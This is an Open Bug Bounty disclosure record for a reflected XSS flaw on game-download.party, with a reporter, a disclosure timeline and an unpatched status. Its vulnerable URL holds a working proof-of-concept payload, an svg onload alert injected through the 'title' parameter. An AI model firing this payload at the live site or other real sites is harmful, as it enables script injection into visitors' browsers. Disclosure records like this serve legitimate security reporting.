game-download.party XSS vulnerability

2017-01-17T04:06:00
ID OBB:206877
Type openbugbounty
Reporter SonnySpooks
Modified 2017-01-24T04:15:00

Description

Vulnerable URL:
http://game-download.party/info.php?title=F--%3E%22%3E%20%3C%22%20%3E%20%22%20%3C%20%20%22%20.,%20%22%20%3C%20%3E%20%22%20%3C/script%3E%3C/title%3E%22%3E%3Csvg/onload=alert(/XSSPOSED/)%3E%2B+Meeting+Hope+%3AD+-+Final+fantasy+XIII-2+Walkthrough%3A+Episode+3+Part+2&videosDes;=Hi+guys%2C+the+first+part+of+this+video+is+me+killing+the+boss+Aloeidai%2C+and+the+fight+was+absolutely+horrible!+I+failed+alot+because+I+didn%27t+have+any+medic+class+for+Hope+...&value;=phHtEV_G8jE
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 28.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 447310
VIP website status:| No
Check game-download.party SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 17 January, 2017 04:06 GMT
Generic security notifications sent to website owner| 17 January, 2017 04:08 GMT
Vulnerability details disclosed by researcher| 24 January, 2017 04:15 GMT